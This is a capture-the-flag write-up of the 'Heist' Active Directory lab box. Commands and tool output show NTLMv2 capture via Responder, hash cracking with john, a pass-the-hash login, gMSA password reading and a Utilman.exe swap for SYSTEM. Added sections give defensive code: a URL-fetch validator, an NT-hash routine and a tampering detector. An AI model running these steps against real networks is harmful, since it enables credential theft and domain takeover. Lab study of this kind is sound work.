Heist — PG Practice (Write Up)

Rajesh Mondal
8 min read · Jan 4, 2024


Heist is an Active Directory machine on Proving Grounds Practice. The initial foothold came from capturing NTLMv2 credentials with Responder.

Nmap scan result of the Heist Server:

┌──(kali㉿kali-linux-2022-2)-[~/offsec/heist]
└─$ cat heist.nmap
# Nmap 7.92 scan initiated Wed Jan 3 18:59:48 2024 as: nmap -sC -sV -Pn -oN heist.nmap 192.168.153.165
Nmap scan report for 192.168.153.165
Host is up (0.19s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-01-03 13:30:36Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: heist.offsec0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: heist.offsec0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=DC01.heist.offsec
| Not valid before: 2023-11-14T05:10:15
|_Not valid after: 2024-05-15T05:10:15
|_ssl-date: 2024-01-03T13:31:30+00:00; 0s from scanner time.
| rdp-ntlm-info:
| Target_Name: HEIST
| NetBIOS_Domain_Name: HEIST
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: heist.offsec
| DNS_Computer_Name: DC01.heist.offsec
| DNS_Tree_Name: heist.offsec
| Product_Version: 10.0.17763
|_ System_Time: 2024-01-03T13:30:50+00:00
8080/tcp open http Werkzeug httpd 2.0.1 (Python 3.9.0)
|_http-title: Super Secure Web Browser
|_http-server-header: Werkzeug/2.0.1 Python/3.9.0
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-01-03T13:30:55
|_ start_date: N/A
Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
# Nmap done at Wed Jan 3 19:01:36 2024 -- 1 IP address (1 host up) scanned in 107.70 seconds

  • Port 53/tcp: Running Simple DNS Plus.
  • Port 88/tcp: Microsoft Windows Kerberos for secure authentication.
  • Port 135/tcp: Microsoft Windows RPC service.
  • Ports 139/tcp and 445/tcp: Microsoft Windows NetBIOS and possibly Microsoft Directory Services.
  • Ports 389/tcp, 3268/tcp: Microsoft Windows Active Directory LDAP services.
  • Port 464/tcp: Potentially for kpasswd5, related to Kerberos.
  • Port 593/tcp: Microsoft Windows RPC over HTTP.
  • Port 636/tcp: Likely secured LDAP service (wrapped by TCP).
  • Port 3269/tcp: Similar to 636/tcp, secured LDAP service (wrapped).
  • Port 3389/tcp: Microsoft Terminal Services (RDP), with detailed SSL certificate information and RDP NTLM info, indicating the target is a Windows system, specifically ‘DC01’ in the ‘HEIST’ domain.
  • Port 8080/tcp: Running Werkzeug HTTP server version 2.0.1 with Python 3.9.0. It hosts a web application titled “Super Secure Web Browser”.

Added records for heist.offsec and dc01.heist.offsec to the /etc/hosts file.

Opening port 8080 in the web browser shows the "Super Secure Web Browser" app.

Entering localhost in the URL field results in an error page.

Then, after starting python http.server on port 80, I entered my own URL in the app's search bar: the directory listing came back in the app, and a visit also showed up in my http.server terminal.

Now, if I start Responder on my VPN interface tun0 and make the app visit my IP instead, let's see what we get.

To my surprise, I got the NTLMv2 hash of a user named enox.
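Why this worked, and what the app should have done instead: the "browser" fetched whatever URL it was given from the server side, and the HTTP client it used answered Responder's NTLM challenge with the credentials of the account the app was running as. The block below is an added example, not code from the box or from this post (the app's real fetch code is never shown). It assumes a validation step with an injectable resolver, so it runs offline in tests, and it refuses any 401/407 that asks for NTLM or Negotiate instead of letting the client authenticate:

```python
"""Checks a server-side URL fetcher should run before following a user-supplied
URL. Added example, not the app's real code. Assumption: the resolver is
injectable so the check can be exercised without network access."""
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def resolve_all(host):
    """Default resolver: every address the name maps to (A and AAAA)."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}


def check_fetch_target(url, resolver=resolve_all):
    """Return (ok, reason). Rejects anything the fetcher must not touch:
    non-HTTP schemes, embedded credentials, and any destination that is not a
    public address (loopback, RFC 1918, link-local, the cloud metadata range).
    For an intranet-only app, swap the is_global test for a hostname allowlist."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme not allowed: {parts.scheme!r}"
    if parts.username is not None or parts.password is not None:
        return False, "credentials embedded in URL"
    host = (parts.hostname or "").lower()
    if not host:
        return False, "no host in URL"
    try:
        # Literal IP: no lookup needed. Otherwise resolve and check EVERY
        # address, since a name may map to several and the client picks one.
        addrs = {str(ipaddress.ip_address(host))}
    except ValueError:
        try:
            addrs = resolver(host)
        except OSError as exc:
            return False, f"resolution failed: {exc}"
    for addr in addrs:
        ip = ipaddress.ip_address(addr)
        if not ip.is_global:
            return False, f"{host} maps to non-public address {ip}"
    # Fetch with redirects disabled (e.g. requests.get(url, allow_redirects=False)),
    # otherwise a 302 to an internal address bypasses everything above.
    return True, "ok"


def refuse_auth_challenge(status, headers):
    """True if the response must be dropped: a 401/407 carrying an NTLM or
    Negotiate challenge. A fetcher that auto-answers these hands the account it
    runs as to whoever controls the destination."""
    if status not in (401, 407):
        return False
    challenge = " ".join(
        v for k, v in headers.items()
        if k.lower() in ("www-authenticate", "proxy-authenticate")
    )
    return any(tok in challenge.upper() for tok in ("NTLM", "NEGOTIATE"))


if __name__ == "__main__":
    # Constructed inputs; the fake resolver keeps this offline.
    fake_dns = {"localhost": {"127.0.0.1"}, "example.com": {"93.184.216.34"}}
    for url in ("http://192.168.45.203/", "http://localhost/", "http://example.com/",
                "file:///etc/passwd", "http://user:pw@example.com/"):
        print(url, check_fetch_target(url, resolver=lambda h: fake_dns[h]))
    print(refuse_auth_challenge(401, {"WWW-Authenticate": "NTLM"}))
```

The address check would have stopped this particular capture only because the VPN address is private; against a server on the internet it is refuse_auth_challenge, plus running the fetcher under an account with no domain identity, that prevents the credential from leaving the host.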

┌──(kali㉿kali-linux-2022-2)-[~/offsec/heist]
└─$ sudo responder -I tun0
NBT-NS, LLMNR & MDNS Responder 3.1.3.0

To support this project:
Patreon -> <https://www.patreon.com/PythonResponder>
Paypal -> <https://paypal.me/PythonResponder>
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]
[+] Generic Options:
Responder NIC [tun0]
Responder IP [192.168.45.203]
Responder IPv6 [fe80::f9ac:c1b0:1888:1951]
Challenge set [random]
Don't Respond To Names ['ISATAP']
[+] Current Session Variables:
Responder Machine Name [WIN-3ZM4RQIJ3VA]
Responder Domain Name [5TLM.LOCAL]
Responder DCE-RPC Port [47726]
[+] Listening for events...

[HTTP] NTLMv2 Client : 192.168.153.165
[HTTP] NTLMv2 Username : HEIST\enox
[HTTP] NTLMv2 Hash : enox::HEIST:<REDACTED>:<REDACTED>:<REDACTED>
[+] Exiting...

I saved the hash to enox.hash and tried to crack it with john.

┌──(kali㉿kali-linux-2022-2)-[~/offsec/heist]
└─$ john enox.hash
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
c********a (enox)
1g 0:00:00:00 DONE 2/3 (2024-01-03 20:40) 50.00g/s 477700p/s 477700c/s 477700C/s 123456..Peter
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.

and got the password within a blink.

Using this credential, I got access with evil-winrm.

┌──(kali㉿kali-linux-2022-2)-[~/offsec/heist]
└─$ evil-winrm -u enox -p california -i 192.168.153.165

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: <https://github.com/Hackplayers/evil-winrm#Remote-path-completion>

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\enox\Documents> whoami
heist\enox

Now, searching for txt files, I found two files.

*Evil-WinRM* PS C:\Users\enox\Documents> get-childitem -path C:\Users\ -include *.txt -file -recurse -erroraction silentlycontinue

    Directory: C:\Users\enox\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        1/3/2024   5:27 AM             34 local.txt
-a----       5/27/2021   7:03 AM            239 todo.txt

*Evil-WinRM* PS C:\Users\enox\Documents>

I got the local flag using the cat command.

*Evil-WinRM* PS C:\Users\enox\Documents> cat C:\Users\enox\Desktop\local.txt
9138c0caa8a81d2082df2f40891ed1a6
*Evil-WinRM* PS C:\Users\enox\Documents> cat C:\Users\enox\Desktop\todo.txt
- Setup Flask Application for Secure Browser [DONE]
- Use group managed service account for apache [DONE]
- Migrate to apache
- Debug Flask Application [DONE]
- Remove Flask Application
- Submit IT Expenses file to admin. [DONE]

and got the content of the todo file.

Using net user /domain I found the users on this domain.

*Evil-WinRM* PS C:\Users\enox\Documents> net user /domain
User accounts for \\

-------------------------------------------------------------------------------
Administrator enox Guest
krbtgt
The command completed with one or more errors.

We are enox. If we check enox's group membership we can see:

*Evil-WinRM* PS C:\Users\enox\Documents> net user enox /domain
User name enox
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set            8/31/2021 5:09:05 AM
Password expires Never
Password changeable 9/1/2021 5:09:05 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 11/14/2023 9:10:55 PM
Logon hours allowed All

Local Group Memberships *Remote Management Use
Global Group memberships *Web Admins *Domain Users
The command completed successfully.

We can see enox is a member of Web Admins.

Uploaded winPEASx64.exe to the target system.

*Evil-WinRM* PS C:\Users\enox\Documents> upload winpeasx64.exe

Info: Uploading /home/kali/offsec/heist/winpeasx64.exe to C:\Users\enox\Documents\winpeasx64.exe

Data: 3183272 bytes of 3183272 bytes copied

Info: Upload successful!

Using winPEAS I found that there is a service account, svc_apache$.

We also saw in the todo.txt file that

- Use group managed service account for apache [DONE]

So hopefully this group managed service account (gMSA) will be the hole to the highest privilege.

Running GMSAPasswordReader.exe with --accountname svc_apache:

*Evil-WinRM* PS C:\Users\enox\Documents> .\gmsapasswordreader.exe --accountname svc_apache
Calculating hashes for Old Value
[*] Input username : svc_apache$
[*] Input domain : HEIST.OFFSEC
[*] Salt : HEIST.OFFSECsvc_apache$
[*] rc4_hmac : B8730DFF931E27DC2D3A77BBDA4B5253
[*] aes128_cts_hmac_sha1 : E4A2B58F686F64C56026456196555C32
[*] aes256_cts_hmac_sha1 : D2CF4C019A5EAC62F432AF99B230F9079658DC8A0071E4E2F11C1EF0FA257756
[*] des_cbc_md5 : 7CBFF2A41FC2D0D6
Calculating hashes for Current Value
[*] Input username : svc_apache$
[*] Input domain : HEIST.OFFSEC
[*] Salt : HEIST.OFFSECsvc_apache$
[*] rc4_hmac : 526C435B8E4CF11F447D6EF7152665BB
[*] aes128_cts_hmac_sha1 : 19565C12FDE19AD1033BA3BBD56DD230
[*] aes256_cts_hmac_sha1 : 43F6DECE6269A588687ACFF41F633A0F7AA9C3FBC7FEAB8BE6981854C19FE817
[*] des_cbc_md5 : 4AEA91DCEF918F29

I got the rc4_hmac hash of the svc_apache$ account, which is the same as its NT hash; that means we can use it to log in with evil-winrm (pass-the-hash).
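On the "rc4_hmac is the NT hash" point: the Kerberos etype 23 (rc4_hmac) key is MD4 over the UTF-16LE encoding of the password, which is exactly the NT hash, so the value GMSAPasswordReader prints can be passed to evil-winrm -H without cracking anything. A gMSA password is a long random string that no human ever types, so cracking would be hopeless anyway, but the derived key is as good as the password. The block below is an added example, not part of this post or of GMSAPasswordReader; it carries a pure-Python MD4 because many OpenSSL 3 builds no longer expose md4 through hashlib, and the inputs it is checked against ("password", "abc", the empty string) are standard test vectors, not values from the box:

```python
"""NT hash == rc4_hmac Kerberos key == MD4(UTF-16LE(password)).
Added example, not from the post. Pure-Python MD4 (RFC 1320) so it runs where
hashlib has no md4."""
import struct

_MASK = 0xFFFFFFFF


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & _MASK


def md4(data: bytes) -> bytes:
    """MD4 digest of data (16 bytes)."""
    a0, b0, c0, d0 = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    bit_len = len(data) * 8
    # Padding: 0x80, zeros to 56 mod 64, then the bit length as little-endian u64.
    data += b"\x80"
    data += b"\x00" * ((56 - len(data) % 64) % 64)
    data += struct.pack("<Q", bit_len)

    def F(x, y, z): return (x & y) | (~x & z)
    def G(x, y, z): return (x & y) | (x & z) | (y & z)
    def H(x, y, z): return x ^ y ^ z

    for off in range(0, len(data), 64):
        X = struct.unpack("<16I", data[off:off + 64])
        A, B, C, D = a0, b0, c0, d0
        for i in range(16):                                   # round 1
            A = _rotl((A + F(B, C, D) + X[i]) & _MASK, (3, 7, 11, 19)[i % 4])
            A, B, C, D = D, A, B, C
        for i in range(16):                                   # round 2
            k = (i % 4) * 4 + i // 4                          # 0,4,8,12,1,5,...
            A = _rotl((A + G(B, C, D) + X[k] + 0x5A827999) & _MASK, (3, 5, 9, 13)[i % 4])
            A, B, C, D = D, A, B, C
        for i in range(16):                                   # round 3
            k = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)[i]
            A = _rotl((A + H(B, C, D) + X[k] + 0x6ED9EBA1) & _MASK, (3, 9, 11, 15)[i % 4])
            A, B, C, D = D, A, B, C
        a0, b0, c0, d0 = ((a0 + A) & _MASK, (b0 + B) & _MASK,
                          (c0 + C) & _MASK, (d0 + D) & _MASK)
    return struct.pack("<4I", a0, b0, c0, d0)


def nt_hash_from_utf16(password_utf16le: bytes) -> str:
    """NT hash (and therefore the rc4_hmac key) of a password that is already
    UTF-16LE bytes; a gMSA's managed password is handed out in exactly that form."""
    return md4(password_utf16le).hex()


def nt_hash(password: str) -> str:
    """NT hash of a human-typed password."""
    return nt_hash_from_utf16(password.encode("utf-16-le"))


if __name__ == "__main__":
    # Constructed inputs; "password" is the classic test vector, not the box's value.
    print(nt_hash("password"))          # 8846f7eaee8fb117ad06bdd830b7586c
    print(md4(b"abc").hex())            # a448017aaf21d8525fc10ae87aa6729d
```

The defensive takeaway is AD hygiene rather than code: the principals allowed to read a gMSA's password (PrincipalsAllowedToRetrieveManagedPassword on the account) should be only the hosts that run the service, never a broad admin group; here a member of Web Admins could read it, and the key is immediately usable for logon.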

┌──(kali㉿kali-linux-2022-2)-[~/offsec/heist]
└─$ evil-winrm -u 'svc_apache$' -H "526C435B8E4CF11F447D6EF7152665BB" -i 192.168.216.165

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: <https://github.com/Hackplayers/evil-winrm#Remote-path-completion>

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_apache$\Documents> whoami
heist\svc_apache$
*Evil-WinRM* PS C:\Users\svc_apache$\Documents>

Now we have a foothold as the service account.

If we check the privileges of the service account, we can see that SeRestorePrivilege is enabled.

Searching Google for this, I found:

Reference: https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens

I found the Utilman.exe file using the get-childitem cmdlet.

*Evil-WinRM* PS C:\Users\svc_apache$\Documents> get-childitem -path C:\Windows\System32\ -include utilman.exe -file -recurse -erroraction silentlycontinue

    Directory: C:\Windows\System32

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----       5/28/2021   4:10 AM         113664 Utilman.exe

I moved Utilman.exe to Utilman.old.

*Evil-WinRM* PS C:\Users\svc_apache$\Documents> mv C:\Windows\System32\Utilman.exe C:\Windows\System32\Utilman.old

Then I moved cmd.exe to Utilman.exe.

*Evil-WinRM* PS C:\Windows\System32> mv cmd.exe Utilman.exe

Opened an RDP session using rdesktop.

Then I pressed Win+U and the command prompt appeared.

I found I now had cmd as NT AUTHORITY\SYSTEM.

From the Administrator's Desktop I found the proof flag.
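From the defender's side, the Win+U trick works because the logon screen launches Utilman.exe as SYSTEM before anyone signs in, and SeRestorePrivilege is what let a non-admin service account overwrite files under System32 to stage it. Two things are worth alerting on: any accessibility binary in System32 written or renamed by something other than Windows servicing, and the leftover original (Utilman.old) appearing beside it. The detection below is an added example, not from the post or from any product; the event records are constructed in a Sysmon-like shape (EventType, Image, User, SourceFilename, TargetFilename) and the field names are assumptions, so map them to whatever your sensor actually emits:

```python
"""Flag accessibility binaries under System32 being written or renamed by
anything other than Windows servicing. Added example, not from the post.
The records are constructed in a Sysmon-like shape; field names are assumptions."""
import ntpath

# Binaries the logon screen / secure desktop launches as SYSTEM.
ACCESSIBILITY_BINARIES = {
    "utilman.exe", "sethc.exe", "osk.exe", "narrator.exe",
    "magnify.exe", "displayswitch.exe", "atbroker.exe",
}
# Processes that legitimately rewrite System32 during servicing.
SERVICING_IMAGES = {"tiworker.exe", "trustedinstaller.exe"}
SYSTEM32 = r"c:\windows\system32"

# Constructed sample events mirroring the steps in this write-up.
SAMPLE_EVENTS = [
    {"EventType": "FileCreate", "Image": r"C:\Windows\servicing\TrustedInstaller.exe",
     "User": r"NT AUTHORITY\SYSTEM",
     "TargetFilename": r"C:\Windows\System32\Utilman.exe"},          # benign: servicing
    {"EventType": "FileRename", "Image": r"C:\Windows\System32\wsmprovhost.exe",
     "User": r"HEIST\svc_apache$",
     "SourceFilename": r"C:\Windows\System32\Utilman.exe",
     "TargetFilename": r"C:\Windows\System32\Utilman.old"},           # original moved aside
    {"EventType": "FileRename", "Image": r"C:\Windows\System32\wsmprovhost.exe",
     "User": r"HEIST\svc_apache$",
     "SourceFilename": r"C:\Windows\System32\cmd.exe",
     "TargetFilename": r"C:\Windows\System32\Utilman.exe"},           # cmd.exe swapped in
    {"EventType": "FileCreate", "Image": r"C:\Windows\System32\notepad.exe",
     "User": r"HEIST\enox",
     "TargetFilename": r"C:\Users\enox\Desktop\notes.txt"},           # benign: user file
]


def is_accessibility_target(path):
    """True for an accessibility binary under System32, including renamed
    copies with another extension (Utilman.old is as interesting as Utilman.exe)."""
    directory, name = ntpath.split(path)
    if directory.lower().rstrip("\\") != SYSTEM32:
        return False
    stem, _ext = ntpath.splitext(name.lower())
    return stem + ".exe" in ACCESSIBILITY_BINARIES


def detect_accessibility_tampering(events):
    """Return one alert per event that creates, overwrites or renames an
    accessibility binary in System32 from a non-servicing process."""
    alerts = []
    for ev in events:
        touched = [p for p in (ev.get("SourceFilename"), ev.get("TargetFilename"))
                   if p and is_accessibility_target(p)]
        if not touched:
            continue
        image = ntpath.basename(ev.get("Image", "")).lower()
        if image in SERVICING_IMAGES:
            continue
        alerts.append({"user": ev.get("User"), "image": image,
                       "action": ev.get("EventType"), "paths": touched})
    return alerts


if __name__ == "__main__":
    for alert in detect_accessibility_tampering(SAMPLE_EVENTS):
        print(alert)
```

Whether a same-volume rename shows up as a distinct event depends on the sensor and its configuration, which is why the function looks at both the source and the target path of every record rather than trusting one event type. The longer-term fix is the one the gMSA step points at: a service account that holds SeRestorePrivilege and can be logged into over WinRM should not exist.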
